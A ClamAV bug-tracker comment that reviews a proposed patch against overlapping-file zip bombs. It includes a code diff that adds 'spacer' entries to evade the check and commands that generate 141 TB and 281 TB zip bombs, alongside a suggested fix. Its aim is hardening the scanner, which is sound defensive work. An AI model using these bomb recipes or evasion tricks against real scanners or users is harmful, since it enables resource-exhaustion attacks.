Originally posted at https://bugzilla.clamav.net/show_bug.cgi?id=12356#c6 David Fifield 2019-08-05 18:32:34 EDT (In reply to Micah Snyder from comment #4) > I have a patch that records the size and offset of the previous file found > in the zip when performing extraction using the central directory. It > compares these values with the current file to determine if the local file > header data is overlapping. I think the technique of comparing only successive central directory entries can be fooled, for instance by inserting "spacer" files in the central directory between the bomb files. For example, try this modification to the zipbomb source code: @@ -664,6 +664,13 @@ def write_zip_quoted_overlap(f, num_files, compressed_size=None, max_uncompresse central_directory.append(CentralDirectoryHeader(offset, record.header)) offset += f.write(record.header.serialize(zip64=zip64)) offset += f.write(record.data) + spacers = [] + for i in range(num_files - 1): + header = LocalFileHeader(0, 0, binascii.crc32(b""), b"spacer" + filename_for_index(i), compression_method=0) + spacers.append(CentralDirectoryHeader(offset, header)) + offset += f.write(header.serialize(zip64=zip64)) + offset += f.write(b"") + central_directory = [x for y in zip(central_directory, spacers) for x in y] + central_directory[len(spacers):] cd_offset = offset for cd_header in central_directory: Generate a zip file using the command: ./zipbomb --mode=quoted_overlap --num-files=32767 --max-uncompressed-size=4292788525 > spaced.zip It unzips to 141 TB, still pretty big. The order of files as laid out in the zip file is 4293868383 0 4293868352 1 4293868321 2 4293868290 3 ... 4292788504 O95 4292788471 O96 0 spacer0 0 spacer1 0 spacer2 0 spacer3 ... 0 spacerO95 But the order they appear in the central directory is 4293868383 0 0 spacer0 4293868352 1 0 spacer1 4293868321 2 0 spacer2 4293868290 3 0 spacer3 ... 4292788504 O95 0 spacerO95 4292788471 O96 One way to deal with this would be to first make a pass over the central directory and sort the files by their file_local_offset. Then it's safe to compare file n only against file n+1. (I didn't actually try this against clamscan -- sorry if there's already a sort somewhere that I didn't notice.) Additionally, the patches only detect overlapping files if cur_file_local_offset > prev_file_local_offset or prev_file_local_offset > cur_file_local_offset, not when prev_file_local_offset == cur_file_local_offset. It may fail when files overlap exactly, as in https://www.bamsoftware.com/hacks/zipbomb/#overlap. Here is a recipe to make another test case (7 MB → 281 TB): ./zipbomb --mode=full_overlap --num-files=65534 --max-uncompressed-size=4294967295 > overlap.zip